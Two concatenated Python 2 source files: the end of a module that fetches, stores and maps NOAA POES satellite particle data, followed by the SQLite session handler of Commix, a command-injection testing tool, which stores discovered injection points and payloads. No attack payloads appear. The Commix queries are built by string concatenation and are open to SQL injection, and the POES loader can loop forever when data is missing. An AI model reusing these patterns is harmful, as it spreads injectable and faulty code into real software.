default = None * [**folon**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bye values in the range [a,b] will be returned. default = None * [**ted**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bze values in the range [a,b] will be returned. default = None * [**echar**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bym values in the range [a,b] will be returned. default = None * [**pchar**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bzm values in the range [a,b] will be returned. default = None **Returns**: * **poesList** (list or None): if data is found, a list of :class:`poesRec` objects matching the input parameters is returned. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.readPoes(sTime=dt.datetime(2011,1,1),eTime=dt.datetime(2011,6,1),folat=[60,80]) written by AJ, 20130131 """ import datetime as dt import davitpy.pydarn.sdio.dbUtils as db #check all the inputs for validity assert(isinstance(sTime,dt.datetime)), \ 'error, sTime must be a datetime object' assert(eTime == None or isinstance(eTime,dt.datetime)), \ 'error, eTime must be either None or a datetime object' assert(satnum == None or isinstance(satnum,int)), 'error, satnum must be an int' var = locals() for name in ['folat','folon','ted','echar','pchar']: assert(var[name] == None or (isinstance(var[name],list) and \ isinstance(var[name][0],(int,float)) and isinstance(var[name][1],(int,float)))), \ 'error,'+name+' must None or a list of 2 numbers' if(eTime == None): eTime = sTime+dt.timedelta(days=1) qryList = [] #if arguments are provided, query for those qryList.append({'time':{'$gte':sTime}}) if(eTime != None): qryList.append({'time':{'$lte':eTime}}) if(satnum != None): 
qryList.append({'satnum':satnum}) var = locals() for name in ['folat','folon','ted','echar','pchar']: if(var[name] != None): qryList.append({name:{'$gte':min(var[name])}}) qryList.append({name:{'$lte':max(var[name])}}) #construct the final query definition qryDict = {'$and': qryList} #connect to the database poesData = db.getDataConn(dbName='gme',collName='poes') #do the query if(qryList != []): qry = poesData.find(qryDict) else: qry = poesData.find() if(qry.count() > 0): poesList = [] for rec in qry.sort('time'): poesList.append(poesRec(dbDict=rec)) print '\nreturning a list with',len(poesList),'records of poes data' return poesList #if we didn't find anything on the mongodb else: print '\ncould not find requested data in the mongodb' return None #print 'we will look on the ftp server, but your conditions will be (mostly) ignored' ##read from ftp server #poesList = readPoesFtp(sTime, eTime) #if(poesList != None): #print '\nreturning a list with',len(poesList),'recs of poes data' #return poesList #else: #print '\n no data found on FTP server, returning None...' #return None def readPoesFtp(sTime,eTime=None): """This function reads poes data from the NOAA NGDC server via anonymous FTP connection. .. warning:: You should not use this. Use the general function :func:`readPoes` instead. **Args**: * **sTime** (`datetime <http://tinyurl.com/bl352yx>`_): the earliest time you want data for * [**eTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, eTime will be equal 1 day after sTime. default = None **Returns**: * **poesList** (list or None): if data is found, a list of :class:`poesRec` objects matching the input parameters is returned. If no data is found, None is returned. 
**Example**: :: import datetime as dt poesList = gme.sat.readpoesFtp(dt.datetime(2011,1,1,1,50),eTime=dt.datetime(2011,1,1,10,0)) written by AJ, 20130128 """ from ftplib import FTP import datetime as dt assert(isinstance(sTime,dt.datetime)),'error, sTime must be datetime' if(eTime == None): eTime=sTime+dt.timedelta(days=1) assert(isinstance(eTime,dt.datetime)),'error, eTime must be datetime' assert(eTime >= sTime), 'error, end time greater than start time' #connect to the server try: ftp = FTP('satdat.ngdc.noaa.gov') except Exception,e: print e print 'problem connecting to NOAA server' return None #login as anonymous try: l=ftp.login() except Exception,e: print e print 'problem logging in to NOAA server' return None myPoes = [] #get the poes data myTime = dt.datetime(sTime.year,sTime.month,sTime.day) while(myTime <= eTime): #go to the data directory try: ftp.cwd('/sem/poes/data/avg/txt/'+str(myTime.year)) except Exception,e: print e print 'error getting to data directory' return None #list directory contents dirlist = ftp.nlst() for dire in dirlist: #check for satellite directory if(dire.find('noaa') == -1): continue satnum = dire.replace('noaa','') #chege to file directory ftp.cwd('/sem/poes/data/avg/txt/'+str(myTime.year)+'/'+dire) fname = 'poes_n'+satnum+'_'+myTime.strftime("%Y%m%d")+'.txt' print 'poes: RETR '+fname #list to hold the lines lines = [] #get the data try: ftp.retrlines('RETR '+fname,lines.append) except Exception,e: print e print 'error retrieving',fname #convert the ascii lines into a list of poesRec objects #skip first (header) line for line in lines[1:]: cols = line.split() t = dt.datetime(int(cols[0]), int(cols[1]), int(cols[2]), int(cols[3]),int(cols[4])) if(sTime <= t <= eTime): myPoes.append(poesRec(ftpLine=line,satnum=int(satnum),header=lines[0])) #increment myTime myTime += dt.timedelta(days=1) if(len(myPoes) > 0): return myPoes else: return None def mapPoesMongo(sYear,eYear=None): """This function reads poes data from the NOAA NGDC FTP 
server via anonymous FTP connection and maps it to the mongodb. .. warning:: In general, nobody except the database admins will need to use this function **Args**: * **sYear** (int): the year to begin mapping data * [**eYear**] (int or None): the end year for mapping data. if this is None, eYear will be sYear **Returns**: * Nothing. **Example**: :: gme.sat.mapPoesMongo(2004) written by AJ, 20130131 """ import davitpy.pydarn.sdio.dbUtils as db from davitpy import rcParams import datetime as dt #check inputs assert(isinstance(sYear,int)),'error, sYear must be int' if(eYear == None): eYear=sYear assert(isinstance(eYear,int)),'error, sYear must be None or int' assert(eYear >= sYear), 'error, end year greater than start year' #get data connection mongoData = db.getDataConn(username=rcParams['DBWRITEUSER'],password=rcParams['DBWRITEPASS'],\ dbAddress=rcParams['SDDB'],dbName='gme',collName='poes') #set up all of the indices mongoData.ensure_index('time') mongoData.ensure_index('satnum') mongoData.ensure_index('folat') mongoData.ensure_index('folon') mongoData.ensure_index('ted') mongoData.ensure_index('echar') mongoData.ensure_index('pchar') #read the poes data from the FTP server myTime = dt.datetime(sYear,1,1) while(myTime < dt.datetime(eYear+1,1,1)): #10 day at a time, to not fill up RAM templist = readPoesFtp(myTime,myTime+dt.timedelta(days=10)) if(templist == None): continue for rec in templist: #check if a duplicate record exists qry = mongoData.find({'$and':[{'time':rec.time},{'satnum':rec.satnum}]}) print rec.time, rec.satnum tempRec = rec.toDbDict() cnt = qry.count() #if this is a new record, insert it if(cnt == 0): mongoData.insert(tempRec) #if this is an existing record, update it elif(cnt == 1): print 'foundone!!' 
dbDict = qry.next() temp = dbDict['_id'] dbDict = tempRec dbDict['_id'] = temp mongoData.save(dbDict) else: print 'strange, there is more than 1 record for',rec.time del templist myTime += dt.timedelta(days=10) def overlayPoesTed( baseMapObj, axisHandle, startTime, endTime = None, coords = 'geo', \ hemi = 1, folat = [45., 90.], satNum = None, param='ted', scMin=-3.,scMax=0.5) : """This function overlays POES TED data onto a map object. **Args**: * **baseMapObj** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the map object you want data to be overlayed on. * **axisHandle** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the Axis Handle used. * **startTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the starttime you want data for. If endTime is not given overlays data from satellites with in +/- 45 min of the startTime * [**endTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, data from satellites with in +/- 45 min of the startTime is overlayed. default = None * [**satnum**] (int): the satellite you want data for. eg 17 for noaa17. if this is None, data for all satellites will be returned. default = None * [**coords**] (str): Coordinates of the map object on which you want data to be overlayed on, 'geo', 'mag', 'mlt'. Default 'geo' * [**hemi**] (list or None): Hemisphere of the map object on which you want data to be overlayed on. Value is 1 for northern hemisphere and -1 for the southern hemisphere.Default 1 [**folat**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with latitude values in the range [a,b] will be returned. default = None * [**param**] (str): the name of the poes parameter to be plotted. default='ted' **Returns**: POES TED data is overlayed on the map object. If no data is found, None is returned. 
**Example**: :: import datetime as dt poesList = gme.sat.overlayPoesTed(MapObj, sTime=dt.datetime(2011,3,4,4)) written by Bharat Kunduri, 20130216 """ import utils import matplotlib as mp import datetime import numpy import matplotlib.pyplot as plt import gme.sat.poes as Poes import math import models import matplotlib.cm as cm from scipy import optimize #check all the inputs for validity assert(isinstance(startTime,datetime.datetime)), \ 'error, sTime must be a datetime object' assert(endTime == None or isinstance(endTime,datetime.datetime)), \ 'error, eTime must be either None or a datetime object' var = locals() assert(var['satNum'] == None or (isinstance(var['satNum'],list) )), \ 'error, satNum must None or a list of satellite (integer) numbers' if satNum != None : assert( len(satNum) <= 5 ), \ 'error, there are only 5 POES satellites in operation (atleast when I wrote this code)' assert(var['folat'] == None or (isinstance(var['folat'],list) and \ isinstance(var['folat'][0],(int,float)) and isinstance(var['folat'][1],(int,float)))), \ 'error, folat must None or a list of 2 numbers' # Check the hemisphere and get the appropriate folat folat = [ math.fabs( folat[0] ) * hemi, math.fabs( folat[1] ) * hemi ] # Check if the endTime is given in which case the user wants a specific time interval to search for # If not we'll give him the best available passes for the selected start time... if ( endTime != None ) : timeRange = numpy.array( [ startTime, endTime ] ) else : timeRange = None pltTimeInterval = numpy.array( datetime.timedelta( minutes = 45 ) ) # check if the timeRange is set... 
if not set the timeRange to +/- pltTimeInterval of the startTime if timeRange == None: timeRange = numpy.array( [ startTime - pltTimeInterval, startTime + pltTimeInterval ] ) # SatNums - currently operational POES satellites are 15, 16, 17, 18, 19 if satNum == None: satNum = [None] # If any particular satellite number is not chosen by user loop through all the available one's satNum = numpy.array( satNum ) # I like numpy arrays better that's why I'm converting the satNum list to a numpy array latPoesAll = [[] for j in range(len(satNum))] lonPoesAll = [[] for j in range(len(satNum))] tedPoesAll = [[] for j in range(len(satNum))] timePoesAll = [[] for j in range(len(satNum))] lenDataAll = [[] for j in range(len(satNum))] goodFlg=False for sN in range(len(satNum)) : if(satNum[sN] != None): currPoesList = Poes.readPoes(timeRange[0], eTime = timeRange[1], satnum = int(satNum[sN]), folat = folat) else: currPoesList = Poes.readPoes(timeRange[0], eTime = timeRange[1], satnum = satNum[sN], folat = folat) # Check if the data is loaded... if currPoesList == None : print 'No data found' continue #return None else: goodFlg=True # Loop through the list and store the data into arrays lenDataAll.append(len(currPoesList)) for l in currPoesList : # Store our data in arrays try: tedPoesAll[sN].append(math.log10(getattr(l,param))) if coords == 'mag' or coords == 'mlt': lat,lon,_ = models.aacgm.aacgmConv(l.folat,l.folon, 0., l.time.year, 0) latPoesAll[sN].append(lat) if coords == 'mag': lonPoesAll[sN].append(lon) else: lonPoesAll[sN].append(models.aacgm.mltFromEpoch(utils.timeUtils.datetimeToEpoch(l.time),lon)*360./24.) 
else: latPoesAll[sN].append(l.folat) lonPoesAll[sN].append(l.folon) timePoesAll[sN].append(l.time) except Exception,e: print e print 'could not get parameter for time',l.time if(not goodFlg): return None latPoesAll = numpy.array( latPoesAll ) lonPoesAll = numpy.array( lonPoesAll ) tedPoesAll = numpy.array( tedPoesAll ) timePoesAll = numpy.array( timePoesAll ) lenDataAll = numpy.array( lenDataAll ) poesTicks = [ -3.0, -2.5, -2.0, -1.5, -1.0, -0.5, 0.0, 0.5 ] # get the axis of the figure... ax = axisHandle for nn in range( len(satNum) ) : x, y = baseMapObj(lonPoesAll[nn], latPoesAll[nn]) bpltpoes = baseMapObj.scatter(x,y,c=tedPoesAll[nn], vmin=scMin, vmax=scMax, alpha = 0.7, cmap=cm.jet, zorder = 7., edgecolor='none') timeCurr = timePoesAll[nn] for aa in range( len(latPoesAll[nn]) ) : if aa % 10 == 0: str_curr = str(timeCurr[aa].hour)+':'+str(timeCurr[aa].minute) ax.annotate( str_curr, xy =( x[aa], y[aa] ), size = 5, zorder = 6. ) #cbar = plt.colorbar(bpltpoes, ticks = poesTicks, orientation='horizontal') #cbar.ax.set_xticklabels(poesTicks) #cbar.set_label(r"Total Log Energy Flux [ergs cm$^{-2}$ s$^{-1}$]") return bpltpoes def overlayPoesBnd( baseMapObj, axisHandle, startTime, coords = 'geo', hemi = 1, equBnd = True, polBnd = False ) : """This function reads POES TED data with in +/- 45min of the given time, fits the auroral oval boundaries and overlays them on a map object. The poleward boundary is not accurate all the times due to lesser number of satellite passes identifying it. **Args**: * **baseMapObj** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the map object you want data to be overlayed on. * **axisHandle** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the Axis Handle used. * **startTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the starttime you want data for. 
If endTime is not given overlays data from satellites with in +/- 45 min of the startTime * [**coords**] (list or None): Coordinates of the map object on which you want data to be overlayed on. Default 'geo' * [**hemi**] (list or None): Hemisphere of the map object on which you want data to be overlayed on. Value is 1 for northern hemisphere and -1 for the southern hemisphere.Default 1 * [**equBnd**] (list or None): If this is True the equatorward auroral oval boundary fit from the TED data is overlayed on the map object. Default True * [**polBnd**] (list or None): If this is True the poleward auroral oval boundary fit from the TED data is overlayed on the map object. Default False **Returns**: POES TED data is overlayed on the map object. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.overlayPoesTed(MapObj, sTime=dt.datetime(2011,3,4,4)) written by Bharat Kunduri, 20130216 """ import utils import matplotlib as mp import datetime import numpy import matplotlib.pyplot as plt import gme.sat.poes as Poes import math import matplotlib.cm as cm from scipy import optimize import models #check all the inputs for validity assert(isinstance(startTime,datetime.datetime)), \ 'error, sTime must be a datetime object' # Check the hemisphere and get the appropriate folat folat = [ 45. * hemi, 90. * hemi ] # Get the time range we choose +/- 45 minutes.... pltTimeInterval = numpy.array( datetime.timedelta( minutes = 45 ) ) timeRange = numpy.array( [ startTime - pltTimeInterval, startTime + pltTimeInterval ] ) satNum = [ 15, 16, 17, 18, 19 ] # We set the TED cut-off value to -0.75, # From observed cases this appeared to do well... # though fails sometimes especially during geomagnetically quiet times... 
# However this is version 1.0 and there always is room for improvement equBndCutoffVal = -0.75 # If any particular satellite number is not chosen by user loop through all the available one's satNum = numpy.array( satNum ) # I like numpy arrays better that's why I'm converting the satNum list to a numpy array latPoesAll = [[] for j in range(len(satNum))] lonPoesAll = [[] for j in range(len(satNum))] tedPoesAll = [[] for j in range(len(satNum))] timePoesAll = [[] for j in range(len(satNum))] lenDataAll = [[] for j in range(len(satNum))] for sN in range( len(satNum) ) : currPoesList = Poes.readPoes( timeRange[0], eTime = timeRange[1], satnum = int(satNum[sN]), folat = folat ) # Check if the data is loaded... if currPoesList == None : print 'No data found' continue # Loop through the list and store the data into arrays lenDataAll.append( len( currPoesList ) ) for l in range( lenDataAll[-1] ) : # Store our data in arrays if the TED data value is > than the cutoff value try: x = math.log10(currPoesList[l].ted) except: continue if x > equBndCutoffVal: if coords == 'mag' or coords == 'mlt': lat,lon,_ = models.aacgm.aacgmConv(currPoesList[l].folat,currPoesList[l].folon, 0., currPoesList[l].time.year, 0) latPoesAll[sN].append(lat) if coords == 'mag': lonPoesAll[sN].append(lon) else: lonPoesAll[sN].append(models.aacgm.mltFromEpoch(utils.timeUtils.datetimeToEpoch(currPoesList[l].time),lon)*360./24.) else: latPoesAll[sN].append(currPoesList[l].folat) lonPoesAll[sN].append(currPoesList[l].folon) # latPoesAll[sN].append( currPoesList[l].folat ) # lonPoesAll[sN].append( currPoesList[l].folon ) tedPoesAll[sN].append( math.log10(currPoesList[l].ted) ) timePoesAll[sN].append( currPoesList[l].time ) latPoesAll = numpy.array( latPoesAll ) lonPoesAll = numpy.array( lonPoesAll ) tedPoesAll = numpy.array( tedPoesAll ) timePoesAll = numpy.array( timePoesAll ) lenDataAll = numpy.array( lenDataAll ) # Now to identify the boundaries... 
# Also need to check if the boundary is equatorward or poleward.. # When satellite is moving from high-lat to low-lat decrease in flux would mean equatorward boundary # When satellite is moving from low-lat to high-lat increase in flux would mean equatorward boundary # that is what we are trying to check here eqBndLats = [] eqBndLons = [] poBndLats = [] poBndLons = [] for n1 in range( len(satNum) ) : currSatLats = latPoesAll[n1] currSatLons = lonPoesAll[n1] currSatTeds = tedPoesAll[n1] testLatArrLtoh = [] testLonArrLtoh = [] testLatArrHtol = [] testLonArrHtol = [] testLatArrLtohP = [] testLonArrLtohP = [] testLatArrHtolP = [] testLonArrHtolP = [] for n2 in range( len(currSatLats)-1 ) : #Check if the satellite is moving form low-lat to high-lat or otherwise if ( math.fabs( currSatLats[n2] ) < math.fabs( currSatLats[n2+1] ) ) : if ( currSatTeds[n2] < currSatTeds[n2+1] ) : testLatArrLtoh.append( currSatLats[n2] ) testLonArrLtoh.append( currSatLons[n2] ) if ( currSatTeds[n2] > currSatTeds[n2+1] ) : testLatArrLtohP.append( currSatLats[n2] ) testLonArrLtohP.append( currSatLons[n2] ) if ( math.fabs( currSatLats[n2] ) > math.fabs( currSatLats[n2+1] ) ) : if ( currSatTeds[n2] > currSatTeds[n2+1] ) : testLatArrHtol.append( currSatLats[n2] ) testLonArrHtol.append( currSatLons[n2] ) if ( currSatTeds[n2] < currSatTeds[n2+1] ) : testLatArrHtolP.append( currSatLats[n2] ) testLonArrHtolP.append( currSatLons[n2] ) # I do this to find the index of the min lat... 
if ( testLatArrLtoh != [] ) : testLatArrLtoh = numpy.array( testLatArrLtoh ) testLonArrLtoh = numpy.array( testLonArrLtoh ) VarEqLat1 = testLatArrLtoh[ numpy.where( testLatArrLtoh == min(testLatArrLtoh) ) ] VarEqLon1 = testLonArrLtoh[ numpy.where( testLatArrLtoh == min(testLatArrLtoh) ) ] eqBndLats.append( VarEqLat1[0] ) eqBndLons.append( VarEqLon1[0] ) if ( testLatArrHtol != [] ) : testLatArrHtol = numpy.array( testLatArrHtol ) testLonArrHtol = numpy.array( testLonArrHtol ) VarEqLat2 = testLatArrHtol[ numpy.where( testLatArrHtol == min(testLatArrHtol) ) ] VarEqLon2 = testLonArrHtol[ numpy.where( testLatArrHtol == min(testLatArrHtol) ) ] eqBndLats.append( VarEqLat2[0] ) eqBndLons.append( VarEqLon2[0] ) if ( testLatArrLtohP != [] ) : testLatArrLtohP = numpy.array( testLatArrLtohP ) testLonArrLtohP = numpy.array( testLonArrLtohP ) VarEqLatP1 = testLatArrLtohP[ numpy.where( testLatArrLtohP == min(testLatArrLtohP) ) ] VarEqLonP1 = testLonArrLtohP[ numpy.where( testLatArrLtohP == min(testLatArrLtohP) ) ] if VarEqLatP1[0] > 64. : poBndLats.append( VarEqLatP1[0] ) poBndLons.append( VarEqLonP1[0] ) if ( testLatArrHtolP != [] ) : testLatArrHtolP = numpy.array( testLatArrHtolP ) testLonArrHtolP = numpy.array( testLonArrHtolP ) VarEqLatP2 = testLatArrHtolP[ numpy.where( testLatArrHtolP == min(testLatArrHtolP) ) ] VarEqLonP2 = testLonArrHtolP[ numpy.where( testLatArrHtolP == min(testLatArrHtolP) ) ] if VarEqLatP2[0] > 64 : poBndLats.append( VarEqLatP2[0] ) poBndLons.append( VarEqLonP2[0] ) eqBndLats = numpy.array( eqBndLats ) eqBndLons = numpy.array( eqBndLons ) poBndLats = numpy.array( poBndLats ) poBndLons = numpy.array( poBndLons ) #get the axis Handle used ax = axisHandle # Now we do the fitting part... fitfunc = lambda p, x: p[0] + p[1]*numpy.cos(2*math.pi*(x/360.)+p[2]) # Target function errfunc = lambda p, x, y: fitfunc(p, x) - y # Distance to the target function # Initial guess for the parameters # Equatorward boundary p0Equ = [ 1., 1., 1.] 
p1Equ, successEqu = optimize.leastsq(errfunc, p0Equ[:], args=(eqBndLons, eqBndLats)) if polBnd == True : p0Pol = [ 1., 1., 1.] p1Pol, successPol = optimize.leastsq(errfunc, p0Pol[:], args=(poBndLons, poBndLats)) allPlotLons = numpy.linspace(0., 360., 25.) allPlotLons[-1] = 0. eqPlotLats = [] if polBnd == True : poPlotLats = [] for xx in allPlotLons : if equBnd == True : eqPlotLats.append( p1Equ[0] + p1Equ[1]*numpy.cos(2*math.pi*(xx/360.)+p1Equ[2] ) ) if polBnd == True : poPlotLats.append( p1Pol[0] + p1Pol[1]*numpy.cos(2*math.pi*(xx/360.)+p1Pol[2] ) ) xEqu, yEqu = baseMapObj(allPlotLons, eqPlotLats) bpltpoes = baseMapObj.plot( xEqu,yEqu, zorder = 7., color = 'b' ) if polBnd == True : xPol, yPol = baseMapObj(allPlotLons, poPlotLats) bpltpoes = baseMapObj.plot( xPol,yPol, zorder = 7., color = 'r' )
hackersql/sq1map
comm1x/src/utils/session_handler.py
#!/usr/bin/env python # encoding: UTF-8 """ This file is part of Commix Project (http://commixproject.com). Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. For more see the file 'readme/COPYING' for copying permission. """ import os import sys import time import base64 import sqlite3 import urllib2 from src.utils import menu from src.utils import settings from src.thirdparty.colorama import Fore, Back, Style, init """ Session handler via SQLite3 db. """ no_such_table = False """ Generate table name for SQLite3 db. """ def table_name(url): host = url.split('//', 1)[1].split('/', 1)[0] table_name = "session_" + host.replace(".","_").replace(":","_").replace("-","_") return table_name """ Flush session. """ def flush(url): info_msg = "Flushing the stored session from the session file... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: conn = sqlite3.connect(settings.SESSION_FILE) tables = list(conn.execute("SELECT name FROM sqlite_master WHERE type is 'table'")) conn.executescript(';'.join(["DROP TABLE IF EXISTS %s" %i for i in tables])) conn.commit() conn.close() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" except sqlite3.OperationalError, err_msg: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Unable to flush the session file." + str(err_msg).title() print settings.print_critical_msg(err_msg) """ Clear injection point records except latest for every technique. 
""" def clear(url): try: if no_such_table: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("DELETE FROM " + table_name(url) + "_ip WHERE "\ "id NOT IN (SELECT MAX(id) FROM " + \ table_name(url) + "_ip GROUP BY technique);") conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except: settings.LOAD_SESSION = False return False """ Import successful injection points to session file. """ def injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_ip" + \ "(id INTEGER PRIMARY KEY, url VARCHAR, technique VARCHAR, injection_type VARCHAR, separator VARCHAR," \ "shell VARCHAR, vuln_parameter VARCHAR, prefix VARCHAR, suffix VARCHAR, "\ "TAG VARCHAR, alter_shell VARCHAR, payload VARCHAR, http_header VARCHAR, http_request_method VARCHAR, url_time_response INTEGER, "\ "timesec INTEGER, how_long INTEGER, output_length INTEGER, is_vulnerable VARCHAR);") conn.execute("INSERT INTO " + table_name(url) + "_ip(url, technique, injection_type, separator, "\ "shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_header, http_request_method, "\ "url_time_response, timesec, how_long, output_length, is_vulnerable) "\ "VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", \ (str(url), str(technique), str(injection_type), \ str(separator), str(shell), str(vuln_parameter), str(prefix), str(suffix), \ str(TAG), str(alter_shell), str(payload), str(settings.HTTP_HEADER), str(http_request_method), \ int(url_time_response), int(timesec), int(how_long), \ int(output_length), str(is_vulnerable))) conn.commit() conn.close() if settings.INJECTION_CHECKER == False: settings.INJECTION_CHECKER = True except sqlite3.OperationalError, err_msg: 
err_msg = str(err_msg)[:1].upper() + str(err_msg)[1:] + "." err_msg += " You are advised to rerun with switch '--flush-session'." print settings.print_critical_msg(err_msg) sys.exit(0) except sqlite3.DatabaseError, err_msg: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "If the problem persists use the '--flush-session' option." print "\n" + settings.print_critical_msg(err_msg) sys.exit(0) """ Export successful applied techniques from session file. """ def applied_techniques(url, http_request_method): try: conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: applied_techniques = conn.execute("SELECT technique FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC ;") else: applied_techniques = conn.execute("SELECT technique FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.INJECT_TAG + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC ;") values = [] for session in applied_techniques: if "tempfile" in session[0][:8]: settings.TEMPFILE_BASED_STATE = True session = session[0][4:] elif "dynamic" in session[0][:7]: settings.EVAL_BASED_STATE = True session = session[0][13:] values += session[0][:1] applied_techniques = ''.join(list(set(values))) return applied_techniques except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Export successful applied techniques from session file. 
""" def applied_levels(url, http_request_method): try: conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: applied_level = conn.execute("SELECT is_vulnerable FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC;") else: applied_level = conn.execute("SELECT is_vulnerable FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.INJECT_TAG + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC;") for session in applied_level: return session[0] except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Export successful injection points from session file. """ def injection_point_exportation(url, http_request_method): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) result = conn.execute("SELECT * FROM sqlite_master WHERE name = '" + \ table_name(url) + "_ip' AND type = 'table';") if result: if menu.options.tech[:1] == "c": select_injection_type = "R" elif menu.options.tech[:1] == "e": settings.EVAL_BASED_STATE = True select_injection_type = "R" elif menu.options.tech[:1] == "t": select_injection_type = "B" else: select_injection_type = "S" if settings.TEMPFILE_BASED_STATE and select_injection_type == "S": check_injection_technique = "t" elif settings.EVAL_BASED_STATE and select_injection_type == "R": check_injection_technique = "d" else: check_injection_technique = menu.options.tech[:1] if settings.TESTABLE_PARAMETER: cursor = conn.execute("SELECT * FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "injection_type like '" + select_injection_type + "%' AND "\ "technique like '" + check_injection_technique + "%' AND "\ "vuln_parameter = '" + 
settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC limit 1;") else: cursor = conn.execute("SELECT * FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "injection_type like '" + select_injection_type + "%' AND "\ "technique like '" + check_injection_technique + "%' AND "\ "http_header = '" + settings.HTTP_HEADER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC limit 1;") for session in cursor: url = session[1] technique = session[2] injection_type = session[3] separator = session[4] shell = session[5] vuln_parameter = session[6] prefix = session[7] suffix = session[8] TAG = session[9] alter_shell = session[10] payload = session[11] http_request_method = session[13] url_time_response = session[14] timesec = session[15] how_long = session[16] output_length = session[17] is_vulnerable = session[18] return url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable else: no_such_table = True pass except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Notification about session. """ def notification(url, technique, injection_type): try: if settings.LOAD_SESSION == True: success_msg = "A previously stored session has been held against that host." print settings.print_success_msg(success_msg) while True: if not menu.options.batch: question_msg = "Do you want to resume to the " question_msg += "(" + injection_type.split(" ")[0] + ") " question_msg += technique.rsplit(' ', 2)[0] question_msg += " injection point? 
[Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) settings.LOAD_SESSION = sys.stdin.readline().replace("\n","").lower() else: settings.LOAD_SESSION = "" if len(settings.LOAD_SESSION) == 0: settings.LOAD_SESSION = "y" if settings.LOAD_SESSION in settings.CHOICE_YES: return True elif settings.LOAD_SESSION in settings.CHOICE_NO: settings.LOAD_SESSION = False if technique[:1] != "c": while True: question_msg = "Which technique do you want to re-evaluate? [(C)urrent/(a)ll/(n)one] > " sys.stdout.write(settings.print_question_msg(question_msg)) proceed_option = sys.stdin.readline().replace("\n","").lower() if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "a": settings.RETEST = True break elif proceed_option.lower() == "c" : settings.RETEST = False break elif proceed_option.lower() == "n": raise SystemExit() else: pass else: err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if settings.SESSION_APPLIED_TECHNIQUES: menu.options.tech = ''.join(settings.AVAILABLE_TECHNIQUES) return False elif settings.LOAD_SESSION in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + settings.LOAD_SESSION + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) """ Check for specific stored parameter. """ def check_stored_parameter(url, http_request_method): if injection_point_exportation(url, http_request_method): if injection_point_exportation(url, http_request_method)[16] == str(menu.options.level): # Check for stored alternative shell if injection_point_exportation(url, http_request_method)[9] != "": menu.options.alter_shell = injection_point_exportation(url, http_request_method)[9] return True else: return False else: return False """ Import successful command execution outputs to session file. 
